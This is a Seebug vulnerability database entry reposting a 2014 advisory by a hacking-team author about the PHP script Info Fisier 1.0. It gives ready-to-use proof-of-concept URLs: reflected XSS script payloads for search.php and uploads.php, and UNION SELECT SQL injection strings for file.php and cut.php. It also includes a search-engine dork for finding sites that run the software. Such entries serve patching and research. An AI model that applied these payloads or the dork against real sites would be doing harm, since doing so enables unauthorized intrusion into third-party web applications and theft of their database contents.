info fisier 1.0 - Multiple Vulnerabilities

2014-07-01T00:00:00
ID SSV:67293
Type seebug
Reporter Knownsec
Modified 2014-07-01T00:00:00

Description

                                        
                                            
                                                ################################################################################################
# [+] Author : kaozc9                                                                          #
# [+] Email  : kaozc9@gmail.com                                                                #
# [+] Site   : www.paradisextem.co.cc                                                          #
# [+] Team   : ParadisexTeam                                                                   #
# [+] Dork   : Powered by Info Fisier.                                                         #
################################################################################################
#=========================================XSS==================================================#
#                                                                                              #
# Affected Files:                                                                              #
#		http://server/path/search.php                                               #
#               http://server/path/uploads.php                                              #
#                                                                                              #
# POC:                                                                                         #
#     http://server/path/search.php?key=<script>alert(12345);</script>                      #
#     http://server/path/uploads.php?p=<script>alert(12345);</script>                       #
#=========================================SQL==================================================#
#                                                                                              #
# Affected Files:                                                                              #
#		http://server/path/file.php                                                 #
#               http://server/path/cut.php                                                  #
#                                                                                              #
# POC:                                                                                         #
#     http://server/path/file.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11        #
#     http://server/path/cut.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11         #  
#                                                                                              #
################################################################################################